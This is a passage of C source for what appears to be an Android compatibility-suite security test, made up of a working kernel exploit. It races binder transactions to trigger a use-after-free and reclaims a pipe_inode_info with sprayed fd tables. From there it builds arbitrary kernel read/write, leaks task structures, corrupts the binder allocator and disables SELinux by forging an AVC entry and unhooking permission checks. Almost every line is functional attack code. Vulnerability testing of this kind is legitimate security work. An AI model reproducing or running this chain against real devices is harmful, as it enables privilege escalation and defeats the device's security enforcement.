1063 dbg("avc=%016zx", avc);
1064 return avc;
1065 }
1066
u32 get_sid() {
1068 u64 real_cred = r64(current + 0x788);
1069 u64 security = r64(real_cred + 0x78);
1070 u32 sid = r32(security + 4);
1071 dbg("sid=%u", sid);
1072 return sid;
1073 }
1074
1075 struct avc_node {
1076 u32 ssid;
1077 u32 tsid;
1078 u16 tclass;
1079 u16 pad;
1080 u32 allowed;
1081 };
1082
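// Forge an avc_node in scratch memory with allowed = ~0 and link it into what
// appears to be the AVC cache hash bucket for (ssid, tsid, class), so the next
// permission check on that triple succeeds.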
u64 grant(u64 avc, u32 ssid, u32 tsid, u16 class) {
1084 struct avc_node n;
1085 n.ssid = ssid;
1086 n.tsid = tsid;
1087 n.tclass = class;
1088 n.pad = 0;
1089 n.allowed = ~0u;
1090 u64 node = scratch;
1091 for (int i = 0; i < 9; i++)
1092 w64(node + i * 8, 0);
1093 u64 *src = (u64*)&n;
1094 w64(node, src[0]);
1095 w64(node + 8, src[1]);
1096 int hash = (ssid ^ (tsid<<2) ^ (class<<4)) & 0x1ff;
1097 u64 head = avc + hash * 8;
1098 u64 hl = node + 0x28;
1099 u64 first = r64(head);
1100 w128(hl, first, head);
1101 if (first)
1102 w64(first + 8, hl);
1103 w64(head, hl);
1104 dbg("granted security sid");
1105 return hl;
1106 }
1107
int enforce() {
1109 int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
1110 if (fd < 0)
1111 return 1;
1112 dbg("enforce=%d", fd);
1113 char buf;
1114 if (read(fd, &buf, 1) != 1)
1115 return 1;
1116 close(fd);
1117 return buf == '1';
1118 }
1119
void disable_enforce() {
1121 int fd = open("/sys/fs/selinux/enforce", O_WRONLY);
1122 if (fd >= 0) {
1123 write(fd, "0", 1);
1124 close(fd);
1125 }
1126 if (enforce())
1127 fail("failed to switch selinux to permissive");
1128 dbg("selinux now permissive");
1129 }
1130
void disable_selinux() {
1132 if (!enforce()) {
1133 dbg("selinux already permissive");
1134 return;
1135 }
1136 u64 hooks = locate_hooks();
1137 if (hooks == (u64)-1) {
1138 return;
1139 }
1140 u64 avc = locate_avc(hooks);
1141 if (avc == (u64)-1) {
1142 return;
1143 }
1144 unhook(hooks, 0x08); // capable
1145 unhook(hooks, 0x2f); // inode_permission
1146 unhook(hooks, 0x3d); // file_permission
1147 unhook(hooks, 0x49); // file_open
1148 u64 avcnode = grant(avc, get_sid(), 2, 1);
1149 disable_enforce();
1150 hlist_del(avcnode);
1151 }
1152
1153 #define PIPES 8
1154 #define STAGE2_THREADS 64
1155
1156 int cpumask;
1157 int cpu1;
1158 int cpu2;
1159 int tot_cpus;
1160 const char *pipedir;
1161 char *pipepath;
1162 char *pipeid;
1163 int pipefd[PIPES];
1164 sync_t *free_sync;
1165 sync_t *poll_sync;
1166 sync_t *stage2_sync1;
1167 sync_t *stage2_sync2;
1168 sync_t *rw_thread_sync;
1169 int bnd1, bnd2;
1170 u32 to1;
1171 u64 free_ptr;
1172 u64 trigger_time;
1173 int total_txns;
1174 int bad_pipe;
1175 int uaf_pipe;
1176 volatile int uaf_alloc_success;
1177 u64 pipe_inode_info;
1178 int rw_thread_tid;
1179 volatile int rw_cmd;
1180 volatile int rw_bit;
1181 volatile int rw_val;
1182 u64 free_data;
1183 u64 next_free_data;
1184
void select_cpus() {
1186 cpu1 = cpu2 = -1;
1187 for (int i = 7; i >= 0; i--) {
1188 if (do_set_cpu(i) < 0)
1189 continue;
1190 cpumask |= (1 << i);
1191 if (cpu1 < 0)
1192 cpu1 = i;
1193 else if (cpu2 < 0)
1194 cpu2 = i;
1195 tot_cpus++;
1196 }
1197 if (cpu1 < 0 || cpu2 < 0) {
1198 fail("huh, couldn't find 2 cpus");
1199 }
1200 dbg("cpumask=%02x cpu1=%d cpu2=%d", cpumask, cpu1, cpu2);
1201 }
1202
1203 void rw_thread(u64 idx);
1204 void free_thread(u64 arg);
1205 void poll_thread(u64 arg);
1206
int cpu_available(int cpu) {
1208 return !!(cpumask & (1 << cpu));
1209 }
1210
void hog_cpu_thread(u64 arg) {
1212 set_cpu(cpu2);
1213 time_t test_started = start_timer();
1214 while (timer_active(test_started)) {
1215 }
1216 }
1217
void launch_threads() {
1219 launch_thread("txnuaf.log", log_thread, NULL, 0, 1);
1220 launch_thread("txnuaf.hog", hog_cpu_thread, NULL, 0, 1);
1221 launch_thread("txnuaf.free", free_thread, &free_sync, 0, 1);
1222 launch_thread("txnuaf.poll", poll_thread, &poll_sync, 0, 1);
1223 rw_thread_tid = launch_thread("txnuaf.rw", rw_thread, &rw_thread_sync, 0, 0);
1224 }
1225
void open_binders() {
1227 u32 xchg;
1228 bnd1 = get_binder(&xchg);
1229 exchg_put_binder(bnd1, xchg);
1230 dec_ref(bnd1, xchg);
1231 bnd2 = get_binder(&xchg);
1232 to1 = exchg_get_binder(bnd2, xchg);
1233 dec_ref(bnd1, xchg);
1234 }
1235
void make_pipe_path() {
1237 size_t l = strlen(pipedir);
1238 pipepath = malloc(l + 4); // "/pd\0"
1239 strcpy(pipepath, pipedir);
1240 pipepath[l++] = '/';
1241 pipeid = pipepath + l;
1242 }
1243
int open_pipe(int idx) {
1245 if (!pipepath)
1246 make_pipe_path();
1247 sprintf(pipeid, "p%d", idx);
1248 int fd = open(pipepath, O_RDWR);
1249 if (fd < 0)
1250 fail("pipe open fail");
1251 return fd;
1252 }
1253
void open_pipes() {
1255 for (int i = 0; i < PIPES; i++)
1256 pipefd[i] = open_pipe(i);
1257 }
1258
int do_poll(int fd, int timeout) {
1260 struct pollfd pfd;
1261 pfd.fd = fd;
1262 pfd.events = 0;
1263 pfd.revents = 0;
1264 if (poll(&pfd, 1, timeout) < 0)
1265 fail("pipe poll fail");
1266 return pfd.revents;
1267 }
1268
int find_bad_pipe() {
1270 for (int i = 0; i < PIPES; i++) {
1271 if (do_poll(pipefd[i], 0) & POLLHUP) {
1272 dbg("corrupted pipe at %d", i);
1273 bad_pipe = pipefd[i];
1274 sprintf(pipeid, "p%d", i);
1275 return 1;
1276 }
1277 }
1278 return 0;
1279 }
1280
void close_pipes() {
1282 for (int i = 0; i < PIPES; i++) {
1283 if (close(pipefd[i]) < 0)
1284 fail("close pipe fail, i=%d fd=%d", i, pipefd[i]);
1285 }
1286 }
1287
void free_thread(u64 arg) {
1289 set_timerslack();
1290 set_cpu(cpu1);
1291 set_idle();
1292 time_t test_started = start_timer();
1293 while (timer_active(test_started)) {
1294 sync_wait(free_sync);
1295 buf_t *buf = new_buf();
1296 buf_u32(buf, BC_FREE_BUFFER);
1297 buf_uintptr(buf, free_ptr);
1298 struct binder_write_read bwr;
1299 memset(&bwr, 0x00, sizeof(bwr));
1300 bwr.write_buffer = (u64)buf->p;
1301 bwr.write_size = buf->off;
1302 int off = cpu1 < 4 ? 1300 : 350;
1303 u64 target_time = trigger_time - off;
1304 while (time_now() < target_time)
1305 ;
1306 ioctl(bnd1, BINDER_WRITE_READ, &bwr);
1307 free_buf(buf);
1308 sync_done(free_sync);
1309 }
1310 };
1311
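// Race loop: hand the received transaction buffer to free_thread, which issues a
// BC_FREE_BUFFER timed to collide with the reply, then immediately spray pipes in
// the hope that a pipe_inode_info is allocated over the stale buffer; a pipe that
// unexpectedly reports POLLHUP marks a successful corruption.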
void race_cycle() {
1313 dbg("race cycle, this may take time...");
1314 time_t test_started = start_timer();
1315 while (timer_active(test_started)) {
1316 send_txn(bnd2, to1, 0, NULL, NULL);
1317 txn_t t1, t2;
1318 recv_txn(bnd1, &t1);
1319 free_ptr = txn_buf(&t1);
1320 trigger_time = time_now() + 100000;
1321 sync_signal(free_sync);
1322 sleep_until(trigger_time);
1323 send_reply(bnd1);
1324 open_pipes();
1325 recv_txn(bnd2, &t2);
1326 free_txn(&t2);
1327 sync_wait_done(free_sync);
1328 if (find_bad_pipe())
1329 break;
1330 close_pipes();
1331 }
1332 }
1333
void reopen_pipe() {
1335 uaf_pipe = open(pipepath, O_WRONLY);
1336 if (uaf_pipe < 0)
1337 fail("reopen pipe fail");
1338 }
1339
1340 void stage2_thread(u64 cpu);
1341
void stage2_launcher(u64 arg) {
1343 dup2(uaf_pipe, 0);
1344 dup2(bnd1, 1);
1345 dup2(bnd2, 2);
1346 for (int i = 3; i < 1024; i++)
1347 close(i);
1348 unshare_following_clone_files();
1349 int cpu_count = get_nprocs_conf();
1350 for (int cpu = 0; cpu < cpu_count; cpu++) {
1351 if (cpu_available(cpu)) {
1352 for (int i = 0; i < STAGE2_THREADS; i++)
1353 launch_thread("txnuaf.stage2", stage2_thread, NULL, cpu, 0);
1354 }
1355 }
1356 }
1357
void signal_xpl_threads() {
1359 sync_signal(stage2_sync1);
1360 sync_wait_done(stage2_sync1);
1361 sync_signal(stage2_sync2);
1362 sync_wait_done(stage2_sync2);
1363 }
1364
void launch_stage2_threads() {
1366 stage2_sync1 = alloc_sync();
1367 stage2_sync2 = alloc_sync();
1368 sync_set_num_waiters(stage2_sync1, STAGE2_THREADS);
1369 sync_set_num_waiters(stage2_sync2, (tot_cpus - 1) * STAGE2_THREADS);
1370 hook_clone();
1371 unshare_following_clone_files();
1372 launch_thread("txnuaf.stage2_launcher", stage2_launcher, NULL, 0, 0);
1373 // set cpu
1374 signal_xpl_threads();
1375 }
1376
void alloc_txns(int n) {
1378 total_txns += n;
1379 size_t totsz = n * (4 + sizeof(struct binder_transaction_data));
1380 buf_t *buf = new_buf_sz(totsz);
1381 for (int i = 0; i < n; i++) {
1382 buf_u32(buf, BC_TRANSACTION);
1383 struct binder_transaction_data *tr;
1384 tr = buf_alloc(buf, sizeof(*tr));
1385 tr->target.handle = to1;
1386 tr->code = 0;
1387 tr->flags |= TF_ONE_WAY;
1388 tr->data.ptr.buffer = 0;
1389 tr->data.ptr.offsets = 0;
1390 tr->data_size = 0;
1391 tr->offsets_size = 0;
1392 }
1393 binder_write(bnd2, buf);
1394 }
1395
void recv_all_txns(int fd) {
1397 for (int i = 0; i < total_txns; i++) {
1398 txn_t t;
1399 recv_txn(fd, &t);
1400 free_txn(&t);
1401 }
1402 }
1403
void clean_slab() {
1405 // clean node
1406 alloc_txns(4096);
1407 // clean each cpu
1408 int cpu_count = get_nprocs_conf();
1409 for (int i = 0; i < cpu_count; i++) {
1410 if (cpu_available(i)) {
1411 set_cpu(i);
1412 alloc_txns(512);
1413 }
1414 }
1415 set_cpu(cpu1);
1416 // for good measure
1417 alloc_txns(128);
1418 }
1419
void poll_thread(u64 arg) {
1421 set_timerslack();
1422 sync_wait(poll_sync);
1423 do_poll(uaf_pipe, 200);
1424 dbg("poll timeout");
1425 sync_done(poll_sync);
1426 }
1427
void free_pipe_alloc_fdmem() {
1429 clean_slab();
1430 sync_signal(poll_sync);
1431 usleep(50000);
1432 if (close(bad_pipe) < 0) {
1433 fail("free close fail");
1434 return;
1435 }
1436 // alloc fdmem
1437 signal_xpl_threads();
1438 // set all bits
1439 signal_xpl_threads();
1440 dbg("fdmem spray done");
1441 sync_wait_done(poll_sync);
1442 recv_all_txns(bnd1);
1443 }
1444
void find_pipe_slot_thread() {
1446 signal_xpl_threads();
1447 if (!uaf_alloc_success)
1448 fail("inode_info uaf alloc fail - this may sometimes happen, "
1449 "kernel may crash after you close the app");
1450 }
1451
void set_all_bits() {
1453 for (int i = 0x1ff; i >= 3; i--)
1454 if (dup2(1, i) < 0)
1455 fail("dup2 fail, fd=%d", i);
1456 }
1457
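// Bit-level write primitive: the sprayed fd-table bitmaps are assumed to overlap
// the freed pipe_inode_info, so opening or closing fd (addr*8 + i) with dup2/close
// sets or clears individual bits of the 32-bit value at byte offset addr.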
void winfo32_lo(int addr, u32 dat) {
1459 int startbit = addr ? 0 : 3;
1460 addr *= 8;
1461 for (int i = startbit; i < 32; i++) {
1462 int fd = addr + i;
1463 if (dat & (1ul << i)) {
1464 if (dup2(1, fd) < 0)
1465 fail("winfo dup2 fail, fd=%d", fd);
1466 } else {
1467 if (close(fd) < 0 && errno != EBADF)
1468 fail("winfo close fail, fd=%d", fd);
1469 }
1470 }
1471 }
1472
void winfo32_hi(int addr, u32 dat) {
1474 addr *= 8;
1475 for (int i = 0; i < 32; i++) {
1476 u32 bit = dat & (1u << i);
1477 int fd = addr + i;
1478 if (fcntl(fd, F_SETFD, bit ? FD_CLOEXEC : 0) < 0) {
1479 if (errno != EBADF || bit)
1480 fail("winfo fcntl fail fd=%d", fd);
1481 }
1482 }
1483 }
1484
void winfo32(int addr, u32 dat) {
1486 if (addr < 0x40)
1487 winfo32_lo(addr, dat);
1488 else
1489 winfo32_hi(addr - 0x40, dat);
1490 }
1491
void winfo64(int addr, u64 dat) {
1493 winfo32(addr, dat);
1494 winfo32(addr + 4, dat >> 32);
1495 }
1496
u64 rinfo64(int addr) {
1498 addr *= 8;
1499 u64 ret = 0;
1500 for (int i = 0; i < 64; i++) {
1501 int fd = addr + i;
1502 fd_set set;
1503 FD_ZERO(&set);
1504 FD_SET(fd, &set);
1505 struct timeval timeout;
1506 timeout.tv_sec = 0;
1507 timeout.tv_usec = 0;
1508 if (select(fd + 1, &set, NULL, NULL, &timeout) >= 0)
1509 ret |= 1ul << i;
1510 else if (errno != EBADF)
1511 fail("leak select fail");
1512 }
1513 return ret;
1514 }
1515
1516 int files_off = 0x30;
1517 int file_off = 0x48;
1518 int fdt_off = 0x58;
1519 int fmode_off = 0x78;
1520 int faoff = 0x10;
1521
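// Writers for fields of the fake pipe_inode_info, fasync_struct, files_struct and
// fdtable overlaid on the reclaimed memory; the offsets above are presumably those
// of the targeted kernel build.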
void set_pipe_mutex_count(u32 count) {
    winfo32(0, count);
}

void set_pipe_nrbufs(u32 nrbufs) {
    winfo32(0x40, nrbufs);
}

void set_pipe_curbuf(u32 curbuf) {
    winfo32(0x44, curbuf);
}

void set_pipe_buffers(u32 buffers) {
    winfo32(0x48, buffers);
}

void set_pipe_readers(u32 readers) {
    winfo32(0x4c, readers);
}

void set_pipe_fasync_readers(u64 fasync_readers) {
    winfo64(0x70, fasync_readers);
}

void set_pipe_wait_next(u64 next) {
    winfo64(0x30, next);
}

u64 get_pipe_wait_next() {
    return rinfo64(0x30);
}

void set_fa_magic(u32 magic) {
    winfo32(faoff + 4, magic);
}

void set_fa_next(u64 next) {
    winfo64(faoff + 0x10, next);
}

void set_fa_file(u64 file) {
    winfo64(faoff + 0x18, file);
}

u64 get_mutex_owner() {
    return rinfo64(0x18);
}

void set_files_count(int count) {
    winfo32(files_off, count);
}

void set_files_fdt(u64 fdt) {
    winfo64(files_off + 0x20, fdt);
}

void set_fdt_max_fds(u32 max_fds) {
    winfo32(fdt_off, max_fds);
}

void set_fdt_fdarr(u64 fdarr) {
    winfo64(fdt_off + 8, fdarr);
}

void set_fdt_close_on_exec(u64 close_on_exec) {
    winfo64(fdt_off + 0x10, close_on_exec);
}

void set_file_fmode(u32 fmode) {
    winfo32(fmode_off, fmode);
}

void set_file(u64 file) {
    winfo64(file_off, file);
}
1597
1598 void stage2();
1599
void stage2_thread(u64 cpu) {
1601 sync_t *sync = cpu == cpu1 ? stage2_sync1 : stage2_sync2;
1602 sync_wait(sync);
1603 do_set_cpu(cpu);
1604 sync_done(sync);
1605
1606 sync_wait(sync);
1607 if (dup2(1, 0x1ff) < 0) {
1608 fail("dup2 fail");
1609 return;
1610 }
1611 sync_done(sync);
1612
1613 sync_wait(sync);
1614 set_all_bits();
1615 sync_done(sync);
1616
1617 sync_wait(sync);
1618 u64 wait_list = get_pipe_wait_next();
1619 int ok = wait_list != -1l;
1620 if (ok) {
1621 uaf_alloc_success = 1;
1622 pipe_inode_info = wait_list - 0x30;
1623 dbg("pipe_inode_info=%016zx", pipe_inode_info);
1624 }
1625 sync_done(sync);
1626 if (ok)
1627 stage2();
1628 }
1629
void write_pipe_ptr_to(u64 addr) {
1631 set_pipe_wait_next(addr - 8);
1632 do_poll(0, 50);
1633 }
1634
void overwrite_pipe_bufs() {
1636 write_pipe_ptr_to(pipe_inode_info + 0x80);
1637 }
1638
void leak_task_ptr() {
1640 set_pipe_mutex_count(0x7);
1641 set_pipe_wait_next(pipe_inode_info + 0x30);
1642 u64 faptr = pipe_inode_info + faoff;
1643 set_pipe_fasync_readers(faptr);
1644 set_pipe_nrbufs(3);
1645 set_pipe_curbuf(0);
1646 set_pipe_buffers(4);
1647 set_pipe_readers(1);
1648 set_fa_magic(0x4601);
1649 set_fa_next(faptr);
1650 set_fa_file(0xfffffffful); // overlaps with inode_info.wait.lock
1651 sync_signal(rw_thread_sync);
1652 // wait for rw thread to write mutex owner
1653 usleep(100000);
1654 rw_task = get_mutex_owner();
1655 dbg("rw_task=%016zx", rw_task);
1656 // unblock rw thread
1657 set_fa_magic(0);
1658 if (syscall(SYS_tkill, rw_thread_tid, SIGUSR2) < 0)
1659 fail("tkill fail");
1660 dbg("signaled rw_thread");
1661 sync_wait_done(rw_thread_sync);
1662 // wait until klogd has logged the bad magic number error
1663 sleep(1);
1664 }
1665
void overwrite_task_files(u64 task) {
1667 write_pipe_ptr_to(task + 0x7c0);
1668 }
1669
void sigfunc(int a) {
1671 }
1672
1673 enum {cmd_read, cmd_write, cmd_exit};
1674
void handle_sig() {
1676 struct sigaction sa;
1677 memset(&sa, 0x00, sizeof(sa));
1678 sa.sa_handler = sigfunc;
1679 if (sigaction(SIGUSR2, &sa, NULL) < 0)
1680 fail("sigaction fail");
1681 }
1682
void rw_thread(u64 idx) {
1684 handle_sig();
1685 sync_wait(rw_thread_sync);
1686 {
1687 void *dat = malloc(0x2000);
1688 dbg("starting blocked write");
1689 if (write(uaf_pipe, dat, 0x2000) != 0x1000) {
1690 fail("expected blocking write=0x1000");
1691 free(dat);
1692 return;
1693 }
1694 free(dat);
1695 }
1696 dbg("write unblocked");
1697 sync_done(rw_thread_sync);
1698 int done = 0;
1699 while (!done) {
1700 sync_wait(rw_thread_sync);
1701 if (rw_cmd == cmd_read) {
1702 int bits = fcntl(rw_bit, F_GETFD);
1703 if (bits < 0) {
1704 fail("F_GETFD fail");
1705 return;
1706 }
1707 rw_val = !!(bits & FD_CLOEXEC);
1708 } else if (rw_cmd == cmd_write) {
1709 if (fcntl(rw_bit, F_SETFD, rw_val ? FD_CLOEXEC : 0) < 0) {
1710 fail("F_SETFD fail");
1711 return;
1712 }
1713 } else {
1714 done = 1;
1715 }
1716 sync_done(rw_thread_sync);
1717 }
1718 }
1719
void set_fdarr(int bit) {
1721 set_fdt_fdarr(pipe_inode_info + file_off - bit * 8);
1722 }
1723
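// Arbitrary kernel read, one byte at a time: point the fake fdtable's
// close_on_exec bitmap at the target address and have rw_thread read each bit
// back with fcntl(F_GETFD); w8 writes bits the same way with F_SETFD.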
u8 r8(u64 addr) {
1725 u8 val = 0;
1726 set_fdt_close_on_exec(addr);
1727 for (int bit = 0; bit < 8; bit++) {
1728 set_fdarr(bit);
1729 rw_bit = bit;
1730 rw_cmd = cmd_read;
1731 sync_signal(rw_thread_sync);
1732 sync_wait_done(rw_thread_sync);
1733 val |= rw_val << bit;
1734 }
1735 return val;
1736 }
1737
void w8(u64 addr, u8 val) {
1739 set_fdt_close_on_exec(addr);
1740 for (int bit = 0; bit < 8; bit++) {
1741 set_fdarr(bit);
1742 rw_bit = bit;
1743 rw_val = val & (1 << bit);
1744 rw_cmd = cmd_write;
1745 sync_signal(rw_thread_sync);
1746 sync_wait_done(rw_thread_sync);
1747 }
1748 }
1749
void exit_rw_thread() {
1751 rw_cmd = cmd_exit;
1752 sync_signal(rw_thread_sync);
1753 sync_wait_done(rw_thread_sync);
1754 }
1755
void w16(u64 addr, u16 val) {
    w8(addr, val);
    w8(addr + 1, val >> 8);
}

void w32(u64 addr, u32 val) {
    w16(addr, val);
    w16(addr + 2, val >> 16);
}

void w64(u64 addr, u64 val) {
    w32(addr, val);
    w32(addr + 4, val >> 32);
}

u16 r16(u64 addr) {
    return r8(addr) | (r8(addr + 1) << 8);
}

u32 r32(u64 addr) {
    return r16(addr) | (r16(addr + 2) << 16);
}

u64 r64(u64 addr) {
    return r32(addr) | (u64)r32(addr + 4) << 32;
}
1782
1783 #define magic 0x55565758595a5b5cul
1784
void set_up_arbitrary_rw() {
1786 overwrite_task_files(rw_task);
1787 set_all_bits();
1788 set_files_count(1);
1789 set_files_fdt(pipe_inode_info + fdt_off);
1790 set_fdt_max_fds(8);
1791 set_file(pipe_inode_info + fmode_off - 0x44);
1792 set_file_fmode(0);
1793 u64 magic_addr = scratch;
1794 w64(magic_addr, magic);
1795 if (r64(magic_addr) != magic)
1796 fail("rw test fail");
1797 dbg("got arbitrary rw");
1798 }
1799
u64 get_current() {
1801 int our_tid = gettid();
1802 u64 leader = r64(rw_task + 0x610);
1803 u64 task = leader;
1804
1805 time_t test_started = start_timer();
1806 while (timer_active(test_started)) {
1807 int tid = r32(task + 0x5d0);
1808 if (tid == our_tid)
1809 return task;
1810 task = r64(task + 0x680) - 0x680;
1811 if (task == leader)
1812 break;
1813 }
1814 fail("current not found");
1815 return (u64)-1;
1816 }
1817
void get_fdarr() {
1819 current = get_current();
1820 if (current == (u64)-1) {
1821 return;
1822 }
1823 dbg("current=%016zx", current);
1824 u64 files = r64(current + 0x7c0);
1825 u64 fdt = r64(files + 0x20);
1826 fdarr = r64(fdt + 8);
1827 }
1828
void place_bnd_buf(u64 v1, u64 v2, txn_t *t) {
1830 txn_t t2;
1831 int do_free = !t;
1832 if (!t)
1833 t = &t2;
1834 buf_t *dat = new_buf();
1835 buf_u64(dat, v1);
1836 buf_u64(dat, v2);
1837 send_txn(2, to1, 0, dat, NULL);
1838 recv_txn(1, t);
1839 if (do_free)
1840 free_txn(t);
1841 send_reply(1);
1842 recv_txn(2, &t2);
1843 free_txn(&t2);
1844 }
1845
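// 16-byte arbitrary write built on the binder free list corrupted in
// set_up_w128(): free_data/next_free_data appear to be binder_buffer data
// pointers, so redirecting them makes the next transaction's two u64s land at addr.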
void w128(u64 addr, u64 v1, u64 v2) {
1847 w64(free_data, addr);
1848 w64(next_free_data, addr + 0x10);
1849 place_bnd_buf(v1, v2, NULL);
1850 }
1851
void set_up_w128() {
1853 u64 bnd = get_file(1);
1854 u64 proc = r64(bnd + 0xd0);
1855 u64 alloc = proc + 0x1c0;
1856 enter_looper(1);
1857 txn_t t1, t2;
1858 place_bnd_buf(0, 0, &t1);
1859 place_bnd_buf(0, 0, &t2);
1860 free_txn(&t1);
1861 u64 free_buffer = r64(alloc + 0x48);
1862 u64 next = r64(free_buffer);
1863 w64(alloc + 0x38, 0);
1864 w64(alloc + 0x78, ~0ul);
1865 free_data = free_buffer + 0x58;
1866 next_free_data = next + 0x58;
1867 u64 magic_addr = scratch + 8;
1868 w128(magic_addr, magic, magic);
1869 if (r64(magic_addr) != magic || r64(magic_addr + 8) != magic)
1870 fail("w128 test fail");
1871 dbg("got w128");
1872 }
1873
void clean_up() {
1875 w64(fdarr, 0);
1876 set_files_count(2);
1877 exit_rw_thread();
1878 }
1879
void exploit() {
1881 set_thread_name("txnuaf");
1882 select_cpus();
1883 set_cpu(cpu1);
1884 set_timerslack();
1885 launch_threads();
1886 open_binders();
1887 race_cycle();
1888 reopen_pipe();
1889 launch_stage2_threads();
1890 free_pipe_alloc_fdmem();
1891 find_pipe_slot_thread();
1892 }
1893
void stage2() {
1895 scratch = pipe_inode_info + 0xb8;
1896 overwrite_pipe_bufs();
1897 leak_task_ptr();
1898 set_up_arbitrary_rw();
1899 get_fdarr();
1900 set_up_w128();
1901 winfo32(0, 0x7);
1902 disable_selinux();
1903 clean_up();
1904 }
1905
1906 JNIEXPORT void JNICALL
Java_android_security_cts_ExploitThread_runxpl(JNIEnv *e, jobject t, jstring jpipedir) {
1908 this = (*e)->NewGlobalRef(e, t);
1909 add_jenv(e);
1910 (*e)->GetJavaVM(e, &jvm);
1911 jclass cls = (*e)->GetObjectClass(e, this);
1912 add_log = (*e)->GetMethodID(e, cls, "addLog", "(Ljava/lang/String;)V");
1913 pipedir = (*e)->GetStringUTFChars(e, jpipedir, NULL);
1914 exploit();
1915 (*e)->ReleaseStringUTFChars(e, jpipedir, pipedir);
1916 }
1917